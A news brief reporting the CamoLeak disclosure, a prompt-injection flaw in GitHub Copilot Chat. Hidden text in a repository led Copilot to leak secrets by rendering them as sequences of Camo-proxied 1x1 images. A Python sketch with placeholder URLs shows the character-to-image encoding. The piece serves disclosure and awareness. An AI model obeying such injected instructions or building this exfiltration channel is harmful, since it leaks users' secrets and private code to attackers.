GitHub patches Copilot Chat flaw that could leak secrets
Briefly

"Researcher Omer Mayraz of Legit Security disclosed a critical vulnerability, dubbed CamoLeak, that could be used to trick Copilot Chat into exfiltrating secrets, private source code, and even descriptions of unpublished vulnerabilities from repositories. The flaw was scored 9.6 on the CVSS scale in the disclosure. The root cause is simple. Copilot Chat runs with the permissions of the signed-in user and ingests contextual text that humans might not see."
"GitHub's Content Security Policy (CSP) and its image-proxy service, Camo, are supposed to stop arbitrary outbound requests, but Mayraz "created a dictionary of all letters and symbols in the alphabet" and pre-generated corresponding Camo-proxied image URLs, effectively mapping each character to a distinct, legitimate Camo URL. The poisoned prompt then instructed Copilot to render the discovered secret as a sequence of 1x1 pixel images."
Getting the stolen data out is the clever part. GitHub's Content Security Policy (CSP) and its image-proxy service, Camo, are supposed to block arbitrary outbound requests. Mayraz sidestepped both: he "created a dictionary of all letters and symbols in the alphabet" and pre-generated a corresponding Camo-proxied image URL for each one, mapping every character to a distinct, legitimately signed Camo URL. The poisoned prompt then instructed Copilot to render the discovered secret as a sequence of 1x1 pixel images, letting the attacker's server reconstruct the secret from the order of image fetches.
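The encoding step is easy to picture. A minimal Python sketch, assuming the attacker has already pre-generated one valid signed Camo URL per character; the dictionary and URLs below are hypothetical placeholders, not Mayraz's actual code:

```python
# Illustrative sketch of the character-to-image encoding. Each character
# is assumed to map to a distinct, validly signed Camo URL that the
# attacker pre-generated; the URLs here are hypothetical placeholders.

ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789_-"

# Hypothetical dictionary: one pre-generated Camo URL per character.
CAMO_DICTIONARY = {
    ch: f"https://camo.githubusercontent.com/{i:032x}/placeholder"
    for i, ch in enumerate(ALPHABET)
}

def encode_secret_as_images(secret: str) -> str:
    """Render a secret as 1x1 images, one per character.

    When the images load in the victim's browser, the attacker's server
    behind the proxied URLs sees which URLs were fetched and in what
    order, and reconstructs the secret character by character.
    """
    tags = []
    for ch in secret.lower():
        url = CAMO_DICTIONARY.get(ch)
        if url is not None:
            tags.append(f'<img src="{url}" width="1" height="1">')
    return "\n".join(tags)

print(encode_secret_as_images("ghp_example"))
```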
Read at The Register